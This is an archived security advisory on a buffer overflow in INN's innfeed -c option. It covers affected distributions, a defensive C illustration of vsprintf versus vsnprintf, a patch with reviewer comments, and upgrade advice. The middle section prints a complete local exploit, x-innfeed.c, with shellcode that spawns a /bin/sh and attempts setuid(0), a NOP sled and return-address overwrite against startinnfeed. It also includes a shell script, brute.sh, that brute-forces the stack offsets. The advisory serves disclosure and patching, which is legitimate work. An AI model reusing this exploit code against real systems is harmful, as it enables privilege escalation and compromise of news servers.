
Security Vulnerability
innfeed Buffer Overflow Vulnerability

Published: 2001-04-24
Updated: 2001-04-24

Affected systems:

  Slackware 7.1 and earlier
  Mandrake 7.0 and earlier
  RedHat 7.2 and earlier
Description:

innfeed is an implementation of NNTP, the protocol used to transfer news articles between hosts; it is the program INN uses to push articles to peer servers.

No bounds check is performed on the argument of the -c option, so an over-long value overflows a stack buffer. This gives the attacker complete control of the stack, and because startinnfeed is setuid root and switches to the news user before running innfeed, the injected code runs with the user ID and group ID of news.

Specifically, the overflow is in logOrPrint() (the original advisory describes it as logOrPrint() calling logOrPrintf()): the message is formatted into a fixed-size buffer with vsprintf(), the call addressed by the patch below. An attacker can use it to run code of their choosing and thereby obtain the user and group ID of news. That gives the attacker ownership of every file belonging to news and, in some cases, the ability to replace those files with trojaned versions; if any of the replaced programs are run by root, root can be compromised as well.
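As an added illustration (not code from this page or from INN), the following shows the shape of the bug and of its fix: a logOrPrint()-style routine that formats an attacker-controlled -c argument into a fixed 512-byte stack buffer with vsprintf(), beside a bounded replacement that derives its limit from the declaration and checks the result. The 512-byte size is taken from the patch further down; the function names, the message wording and the sample argument are constructed for the example and are not innfeed's own.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Size of the fixed log buffer; 512 is the bound used by the patch on this
   page, the real declaration in innfeed is not shown here. */
#define LOG_BUF 512

/* Vulnerable shape (kept for comparison only): vsprintf() is told nothing
   about the size of `buffer`, so a -c value longer than LOG_BUF bytes
   overwrites the saved frame pointer and return address above it.
   Never pass attacker-controlled input to this function. */
static void log_or_print_vulnerable(const char *fmt, ...)
{
    char buffer[LOG_BUF];
    va_list ap;

    va_start(ap, fmt);
    vsprintf(buffer, fmt, ap);          /* unbounded write into buffer[] */
    va_end(ap);
    fputs(buffer, stderr);
}

/* Hardened shape: the bound comes from the caller's declaration via sizeof,
   and the return value is checked instead of discarded.
   Returns 0 if the whole message fit, 1 if it was truncated, -1 on a
   formatting error.  Some pre-C99 libcs (glibc before 2.1, i.e. the era of
   this advisory) return -1 on truncation rather than the needed length;
   callers treat -1 as "the contents of out are not to be trusted". */
static int log_or_print_safe(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    if (n < 0)
        return -1;
    return (size_t)n >= outsz ? 1 : 0;
}

/* Constructed sample input: a -c argument several times the buffer size. */
static const char *oversized_config_arg(void)
{
    static char arg[4 * LOG_BUF];

    memset(arg, 'A', sizeof arg - 1);
    arg[sizeof arg - 1] = '\0';
    return arg;
}

/* Format the error innfeed might log for an unreadable config path (the
   wording is hypothetical) into a LOG_BUF-sized buffer.  Returns the
   truncation status from log_or_print_safe() and, if len is non-NULL,
   the length of the string that was actually stored. */
static int log_config_error(const char *path, size_t *len)
{
    char buffer[LOG_BUF];
    int rc = log_or_print_safe(buffer, sizeof buffer,
                               "cannot open config file %s", path);

    if (rc >= 0 && len != NULL)
        *len = strlen(buffer);
    return rc;
}

/* Convenience wrapper returning only the stored length (0 on error). */
static size_t log_config_error_len(const char *path)
{
    size_t len = 0;

    log_config_error(path, &len);
    return len;
}

int main(void)
{
    size_t len = 0;

    /* Short path: fits in both versions. */
    log_or_print_vulnerable("config %s\n", "/etc/news/innfeed.conf");
    printf("short:     rc=%d len=%zu\n",
           log_config_error("/etc/news/innfeed.conf", &len), len);

    /* Oversized path: the vulnerable routine would smash the stack here;
       the bounded one reports truncation and keeps LOG_BUF-1 bytes. */
    printf("oversized: rc=%d len=%zu\n",
           log_config_error(oversized_config_arg(), &len), len);
    return 0;
}
```

The point of returning the truncation status rather than silently clipping is that a log line cut at 511 bytes is otherwise indistinguishable from a complete one, and an operator reading the log would not know the argument had been tampered with.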

<* Source: Enrique A. Sanchez Montellano
           Alex Hernandez (alex.hernandez@defcom.com)
*>



Test method:

WARNING

The following program (method) may be offensive in nature and is provided for security research and educational purposes only. Use at your own risk!


--- x-innfeed.c ---
/*
x-innfeed.c

Buffer overflow in innfeed being called from startinnfeed
renders uid(news) gid(news), startinnfeed is suid root so
I have to also check if I can manage to get root out of
this ....

Enrique A. Sanchez Montellano
(@defcom.com ... Yes is only @defcom.com)
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

#define OFFSET  0
#define ALIGN   0
#define BUFFER  470

// Select the target at compile time: -DREDHAT (also used for Mandrake) or -DSLACKWARE.

#ifdef REDHAT
/* optimized shellcode ;) (got rid of 2 bytes from aleph1's) */
//static char shellcode[]=
//"\xeb\x15\x5b\x89\x5b\x08\x31\xc0\x88\x43\x07\x89\x43\x0c"
//"\xb0\x0b\x8d\x4b\x08\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";

/* setuid(0); execve("/bin/sh", ["/bin/sh", NULL], NULL); exit() */
char shellcode[] =
  "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" /*setuid(0) */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
  "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
  "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
#endif

#ifdef SLACKWARE
/* optimized shellcode for slackware 7.0 (non setuid(getuid()) shell) */
/* execve("/bin/bash1", ["/bin/bash1", NULL], NULL); no setuid() call */
static char shellcode[] =
  "\xeb\x15\x5b\x89\x5b\x0b\x31\xc0\x88\x43\x0a\x89\x43\x0f\xb0"
  "\x0b\x8d\x4b\x0b\x31\xd2\xcd\x80\xe8\xe6\xff\xff\xff/bin/bash1";
#endif

#if !defined(REDHAT) && !defined(SLACKWARE)
#error "compile with -DREDHAT (RedHat/Mandrake) or -DSLACKWARE"
#endif

/* Returns the current stack pointer. Relies on the 32-bit cdecl convention
   that whatever is left in %eax becomes the return value; build with -m32. */
unsigned long get_sp(void)
{
  __asm__("movl %esp, %eax");
}

void usage(char *name)
{
  printf("Usage: %s <offset> <align> <buffer>\n", name);
  printf("Defcom Labs @ Spain ...\n");
  printf("Enrique A. Sanchez Montellano (@defcom.com)\n");
  exit(0);
}

int main(int argc, char **argv)
{
  char *code;
  int offset = OFFSET;
  int align = ALIGN;
  int buffer = BUFFER;
  unsigned long addr;
  int i;

  if(argc > 4) usage(argv[0]);
  if(argc > 1) offset = atoi(argv[1]);
  if(argc > 2) align = atoi(argv[2]);
  if(argc > 3) buffer = atoi(argv[3]);

  if (buffer < (int)strlen(shellcode) + 8 + align) {
    fprintf(stderr, "buffer (%d) too small for shellcode plus return addresses\n",
            buffer);
    exit(1);
  }

  /* one extra byte: the payload is handed to execl() as a C string */
  code = (char *)malloc(buffer + 1);
  if (code == NULL) {
    perror("malloc");
    exit(1);
  }

  printf("[ + ] innfeed buffer overflow (passed to startinnfeed) [ + ]\n");
  printf("------------------------------------------------------------\n");
  printf("[ + ] Found by: \n\n[ + ] Alex Hernandez"
         "(alex.hernandez@defcom.com)\n"
         "[ + ] Enrique Sanchez (@defcom.com ... "
         "Yes is just @defcom.com)\n");
  printf("[ + ] Defcom Labs @ Spain ....\n");
  printf("[ + ] Coded by Enrique A. Sanchez Montellano (El Nahual)\n\n");

  addr = get_sp() - offset;

  printf("[ + ] Using address 0x%lx\n", addr);

  /* NOP sled across the payload; the loop stays inside the allocation */
  for (i = 0; i + 4 <= buffer; i += 4) {
    *(long *)&code[i] = 0x90909090;
  }

  /* guessed return address in the last two words of the payload
     (32-bit code: long is 4 bytes here) */
  *(long *)&code[buffer - 4] = addr;
  *(long *)&code[buffer - 8] = addr;

  /* shellcode directly below the return addresses, shifted by align */
  memcpy(code + buffer - strlen(shellcode) - 8 - align,
         shellcode, strlen(shellcode));
  code[buffer] = '\0';

  printf("[ + ] Starting exploitation ... \n\n");

  // REDHAT, MANDRAKE ...
#ifdef REDHAT
  execl("/usr/bin/startinnfeed", "/usr/bin/startinnfeed", "-c", code, NULL);
#endif

  // SLACKWARE
#ifdef SLACKWARE
  execl("/usr/lib/news/bin/startinnfeed",
        "/usr/lib/news/bin/startinnfeed", "-c", code, NULL);
#endif

  /* execl() only returns if the exec failed */
  perror("execl");
  return 1;
}
--- x-innfeed.c ---

--- brute.sh ---
#!/bin/ksh
# Walk the stack-pointer offset from -2000 to 12000 one byte at a time,
# re-running the exploit at each step; the loop pauses while a spawned
# shell is open.  Point the path at wherever x-innfeed.c was compiled.
L=-2000
while [ $L -lt 12000 ]
do
  echo $L
  L=`expr $L + 1`
  ../x-startinnfeed $L
done
--- brute.sh ---


Recommendations:

Temporary workaround:

  NSFOCUS recommends not running innfeed as root, which at least reduces
  the risk. In addition, the discoverers of the vulnerability provide the following patch:

---innfeed-overflow.patch---
210c210
<       vsprintf (buffer,fmt,ap);
---
>      vsnprintf (buffer,512,fmt,ap);
---innfeed-overflow.patch---
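Review bot: the replacement on the `>` line hard-codes the bound as 512 instead of deriving it from the declaration of `buffer` (which this hunk does not show), and the return value is still discarded. Prefer `vsnprintf (buffer, sizeof buffer, fmt, ap);` so the bound cannot drift from the declared size, and check the result: on truncation a C99 vsnprintf returns the length that would have been written, while some older libcs return -1, so without that check a silently truncated log line is indistinguishable from a complete one.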

Vendor patch:

  Upgrade to INN 2.3.1, in which this vulnerability is no longer present.



This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; reproduction without permission is prohibited.